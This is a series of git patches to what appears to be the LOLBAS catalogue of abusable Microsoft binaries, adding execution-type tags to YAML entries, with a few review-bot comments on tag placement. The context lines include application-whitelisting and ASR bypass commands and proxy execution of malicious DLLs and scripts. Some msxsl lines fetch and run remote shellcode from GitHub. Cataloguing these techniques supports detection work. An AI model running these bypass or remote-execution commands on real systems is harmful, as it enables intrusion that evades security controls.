@@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: Pester.bat ;calc.exe Description: Execute code using Pester. Example here executes calc.exe Usecase: Proxy execution 
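Review bot: In the third Winrm.yml hunk (`@@ -25,6 +31,9 @@`) the added `- Execute: Remote` is attached to the cscript/winrm.vbs entry, whose description is a local AWL bypass via a malicious WsmPty.xsl (MitreID T1220, XSL script processing) and whose command carries no `-r:` remote target, so the Remote tag looks misplaced there; I would drop that line and keep only `- Execute: CMD`, or use whatever tag the project applies to XSL-based execution. The same pair is justified in the second hunk, where the `winrm invoke Create` command targets `-r:http://acmedc:5985`. The tags added in the first hunk belong to an entry that starts outside the hunk, so I could not check them.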
@@ -18,13 +20,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 - - Command: Pester.bat ;calc.exe - Description: Execute code using Pester. Example here executes calc.exe - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\\bin\Pester.bat Code_Sample: From c9f0857f0fdbffdeef4f3389440b55b39e2bb84f Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 20:24:41 +0200 Subject: [PATCH 101/148] Update CL_mutexverifiers.yml: Identation change --- yml/OSScripts/CL_mutexverifiers.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 27cbea78..59a4a8c3 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 Tags: - - Execute: Powershell + - Execute: Powershell Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 From 16d84e33e689b2f12d5d377d97750af94ca12480 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:17:55 +0200 Subject: [PATCH 102/148] Update AccCheckConsole.yml Tags Changed DLL to .NetDLL --- yml/OtherMSBinaries/AccCheckConsole.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml index be527dad..40140642 100644 --- a/yml/OtherMSBinaries/AccCheckConsole.yml +++ b/yml/OtherMSBinaries/AccCheckConsole.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: DLL + - Execute: .NetDLL - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code to bypass AppLocker. @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: DLL + - Execute: .NetDLL Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe From a01bab762ef21447a0b3ae62468c27df143b3a47 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:21:32 +0200 Subject: [PATCH 103/148] Update Adplus.yml Tags Changed Tags: - Execute CMD - Execute EXE --- yml/OtherMSBinaries/Adplus.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index 006c8b4d..142ad7a7 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -18,6 +18,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: All Windows + Tags: + - Execute: CMD - Command: adplus.exe -c config-adplus.xml Description: Dump process memory using adplus config file (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary @@ -32,6 +34,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: All windows + Tags: + - Execute: CMD + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe From 8fc69956788bed2b3496b2161b1d1ef8b8cb157c Mon Sep 17 00:00:00 2001 
From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:23:22 +0200 Subject: [PATCH 104/148] Update Agentexecutor.yml Tags Added Tags: Execute Powershell Execute EXE --- yml/OtherMSBinaries/Agentexecutor.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml index 8bb87dc5..3517a54f 100644 --- a/yml/OtherMSBinaries/Agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 + Tags: + - Execute: Powershell - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1 Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully Usecase: Execute a provided EXE @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe Code_Sample: From f4cd4d0bd1b8db6f67c783f716874c1b2c5ab071 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:25:16 +0200 Subject: [PATCH 105/148] Update Appcert.yml Tags Added Tags: Execute EXE Execute MSI --- yml/OtherMSBinaries/Appcert.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/Appcert.yml b/yml/OtherMSBinaries/Appcert.yml index 30b817ba..a423ff30 100644 --- a/yml/OtherMSBinaries/Appcert.yml +++ b/yml/OtherMSBinaries/Appcert.yml 
@@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: appcert.exe test -apptype desktop -setuppath c:\users\public\malicious.msi -setupcommandline /q -reportoutputpath c:\users\public\output.xml Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process. Usecase: Execute custom made MSI file with malicious code @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1218.007 OperatingSystem: Windows + Tags: + - Execute: MSI Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\App Certification Kit\appcert.exe - Path: C:\Program Files\Windows Kits\10\App Certification Kit\appcert.exe From e4f73cfafac8b027ede7ea8edf7d79e2d1057868 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:35:16 +0200 Subject: [PATCH 106/148] Update Appvlp.yml Tags Added Tags: Execute CMD Execute EXE --- yml/OtherMSBinaries/Appvlp.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index 54678dbd..620916d6 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 + Tags: + - Execute: CMD - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. 
@@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 + Tags: + - Execute: EXE - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe From 351a3bcac66dd8cfaa5d4fb23378fb057eb270fa Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:36:52 +0200 Subject: [PATCH 107/148] Update Bginfo.yml Tags Added Tag: Execute: Remote --- yml/OtherMSBinaries/Bginfo.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index 386361e1..c61401a8 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml @@ -49,6 +49,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH + - Execute: Remote - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. @@ -58,6 +59,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH + - Execute: Remote Full_Path: - Path: no default Detection: From 37eaa488d17001cba19c3d212a11bed1bd514f50 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:42:37 +0200 Subject: [PATCH 108/148] Update Cdb.yml Tags Added Tags: Execute: CMD Execute: Shellcode --- yml/OtherMSBinaries/Cdb.yml | 6 ++++++ 1 file changed, 6 insertions(+) 
diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 290e847c..87aa504e 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: Shellcode - Command: | cdb.exe -pd -pn .shell @@ -20,6 +22,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CMD - Command: cdb.exe -c C:\debug-script.txt calc Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary @@ -27,6 +31,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe From edf0105284abd47530d3bed3e125b616ea7577e6 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:43:38 +0200 Subject: [PATCH 109/148] Update Coregen.yml Tags Added Execute: DLL tag --- yml/OtherMSBinaries/Coregen.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml index b2fb1f74..7bbacc26 100644 --- a/yml/OtherMSBinaries/Coregen.yml +++ b/yml/OtherMSBinaries/Coregen.yml @@ -20,6 +20,8 @@ Commands: Privileges: User MitreID: T1055 OperatingSystem: Windows + Tags: + - Execute: DLL - Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions. Usecase: Execute DLL code From 83c34ff627fa405f18f07e884509d6840af0c2a4 Mon Sep 17 00:00:00 2001 
From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:56:45 +0200 Subject: [PATCH 110/148] Update Csi.yml Tags Added Tags: Execute: C# --- yml/OtherMSBinaries/Csi.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 991c1bde..939eb1cc 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -11,6 +11,7 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + - Execute: Csharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe From eb3afc669e3756192df02a3c6f7ea11586b15116 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:01:33 +0200 Subject: [PATCH 111/148] Update DefaultPack.yml Tags Added Tags: Execute EXE --- yml/OtherMSBinaries/DefaultPack.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml index a63da150..61b19efd 100644 --- a/yml/OtherMSBinaries/DefaultPack.yml +++ b/yml/OtherMSBinaries/DefaultPack.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe Code_Sample: From 6e9faa63da9fc5350893746f53bf4bbc4acd1789 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:02:22 +0200 Subject: [PATCH 112/148] Update Devinit.yml Tags Added Tags: Execute MSI Execute Remote --- yml/OtherMSBinaries/Devinit.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OtherMSBinaries/Devinit.yml b/yml/OtherMSBinaries/Devinit.yml index 2ed83b48..e02a7001 100644 --- a/yml/OtherMSBinaries/Devinit.yml +++ b/yml/OtherMSBinaries/Devinit.yml 
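Review bot: The single added line `- Execute: Csharp` in the Csi.yml hunk has no `Tags:` parent key, unlike the Dnx.yml hunk on the next line and the Rcsi.yml hunk later in the series, which both add `Tags:` first. Without the parent key the sequence item sits beside the entry's other keys (`Privileges`, `MitreID`, `OperatingSystem`) and will either be read as a new, incomplete `Commands` entry or be rejected by schema validation, depending on the indentation this view does not preserve. The hunk should add `Tags:` followed by `  - Execute: Csharp`, matching the other files.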
@@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: MSI + - Execute: Remote Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\Tools\devinit\devinit.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\Tools\devinit\devinit.exe From 1ba7b664e3fe283bdbe00687b7d8461735372963 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:03:26 +0200 Subject: [PATCH 113/148] Update Devtoolslauncher.yml Tags Added Tags - Execute EXE --- yml/OtherMSBinaries/Devtoolslauncher.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index 2a67dc63..952594d7 100644 --- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed + Tags: + - Execute: EXE - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed + Tags: + - Execute: EXE Full_Path: - Path: 'c:\windows\system32\devtoolslauncher.exe' Code_Sample: From bd6667bc9a561e7c61200d6c98be279f2f2410c7 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:07:27 +0200 Subject: [PATCH 114/148] Update Dnx.yml Tags Added Tag: Execute C# --- yml/OtherMSBinaries/Dnx.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index 44a00cd2..eb613494 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml 
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: Csharp Full_Path: - Path: no default Code_Sample: From b24f3ab6aba67c373fd69cc3b72192645330e462 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:09:40 +0200 Subject: [PATCH 115/148] Update Dotnet.yml tags Added Tags: Execute: .NetDLL Execute: Fsharp Execute: CSProj --- yml/OtherMSBinaries/Dotnet.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 39b59be4..57de2447 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed + Tags: + - Execute: .NetDLL - Command: dotnet.exe [PATH_TO_DLL] Description: dotnet.exe will execute any DLL. Usecase: Execute DLL @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed + Tags: + - Execute: .NetDLL - Command: dotnet.exe fsi Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands Usecase: Execute arbitrary F# code @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 and up with .NET SDK installed + Tags: + - Execute: Fsharp - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code Usecase: Execute code bypassing AWL @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 and up with .NET Core installed + Tags: + - Execute: CSProj Full_Path: - Path: 'C:\Program Files\dotnet\dotnet.exe' Detection: From e2d2633470cb866e21eaa87854fcb2e6de77d4d0 Mon Sep 17 00:00:00 2001 
From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:10:39 +0200 Subject: [PATCH 116/148] Update Dxcap.yml Tags Added Tags: Execute EXE --- yml/OtherMSBinaries/Dxcap.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml index 72b01454..05ac2aad 100644 --- a/yml/OtherMSBinaries/Dxcap.yml +++ b/yml/OtherMSBinaries/Dxcap.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\dxcap.exe - Path: C:\Windows\SysWOW64\dxcap.exe From bc80d35981bd42a024bd494027ae43142ef1119f Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:14:09 +0200 Subject: [PATCH 117/148] Update Fsi.yml tags Added Tags: Execute Fsharp --- yml/OtherMSBinaries/Fsi.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index fb183235..c770ad2a 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: Fsharp - Command: fsi.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: Fsharp Full_Path: - Path: C:\Program Files\dotnet\sdk\\FSharp\fsi.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe From a5ede4597c6aee0010f060b18b02e162a1d4a908 Mon Sep 17 00:00:00 2001 
From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:14:57 +0200 Subject: [PATCH 118/148] Update FsiAnyCpu.yml tags Added Tags: Execute Fsharp --- yml/OtherMSBinaries/FsiAnyCpu.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml index 5b55e35a..2a8f79c6 100644 --- a/yml/OtherMSBinaries/FsiAnyCpu.yml +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: Fsharp - Command: fsianycpu.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: Fsharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe Code_Sample: From 5f2bc7efc263d6840d8f3e1985255ab46c289901 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:15:53 +0200 Subject: [PATCH 119/148] Update Mftrace.yml Tags Added Tags: Execute: EXE --- yml/OtherMSBinaries/Mftrace.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml index 09c960a8..c564efac 100644 --- a/yml/OtherMSBinaries/Mftrace.yml +++ b/yml/OtherMSBinaries/Mftrace.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: Mftrace.exe powershell.exe Description: Launch cmd.exe as a subprocess of Mftrace.exe. Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe. 
@@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86\mftrace.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64\mftrace.exe From e839f4bbbe16e8498b8f39a265610fa70dfbfc60 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:18:12 +0200 Subject: [PATCH 120/148] Update Microsoft.NodejsTools.PressAnyKey.yml Tags Added Tags: Execute EXE --- yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml index 9ac12c29..7ca4f43f 100644 --- a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml +++ b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe From 2e922f4099b7e511d3bdb558ccd41111aaad8bb6 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:19:15 +0200 Subject: [PATCH 121/148] Update Msdeploy.yml Tags Added Tags Execute: CMD --- yml/OtherMSBinaries/Msdeploy.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml index cc3754cf..7cc09217 100644 --- a/yml/OtherMSBinaries/Msdeploy.yml +++ b/yml/OtherMSBinaries/Msdeploy.yml 
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server + Tags: + - Execute: CMD - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" Description: Launch calc.bat via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server + Tags: + - Execute: CMD - Command: msdeploy.exe -verb:sync -source:filePath=C:\windows\system32\calc.exe -dest:filePath=C:\Users\Public\calc.exe Description: Copy file from source to destination. Usecase: Copy file. From f9ea58c0e2550b4565b0db8cf2e0a7763a4e11da Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:20:50 +0200 Subject: [PATCH 122/148] Update Msxsl.yml Tags Added Tags: Execute: XSL Execute: Remote --- yml/OtherMSBinaries/Msxsl.yml | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index 7020e0a2..d87746e4 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL - Command: msxsl.exe customers.xml script.xsl Description: Run COM Scriptlet code within the script.xsl file (local). Usecase: Local execution of script stored in XSL file. 
@@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). Usecase: Local execution of remote script stored in XSL script stored as an XML file. @@ -25,6 +29,9 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL + - Execute: Remote - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). Usecase: Local execution of remote script stored in XSL script stored as an XML file. @@ -32,6 +39,9 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL + - Execute: Remote - Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o Description: Using remote XML and XSL files, save the transformed XML file to disk. Usecase: Download a file from the internet and save it to disk. From 7b7c58b2d103474c24d02ce4dcef7b92c4049638 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:21:46 +0200 Subject: [PATCH 123/148] Update OpenConsole.yml Tags Added Tags: - Execute: EXE --- yml/OtherMSBinaries/OpenConsole.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/OpenConsole.yml b/yml/OtherMSBinaries/OpenConsole.yml index 81d00e30..d56eaca2 100644 --- a/yml/OtherMSBinaries/OpenConsole.yml 
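Review bot: The fourth Msxsl.yml command, `msxsl.exe ... calc.xml ... transform.xsl -o` (download a file and save it to disk), receives no `Tags` block in the `-32,6 +39,9` hunk, while the three entries before it each get `Execute: XSL` and the two remote ones also `Execute: Remote`; the 10-insertion diffstat confirms no other hunk covers it. That entry also fetches remote content, so it should either carry `- Execute: Remote` like its siblings or the commit message should state that download-only entries are deliberately left untagged until a non-Execute tag category exists. Consumers that filter on tags will otherwise miss the only entry in this file that writes a remote file to disk.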
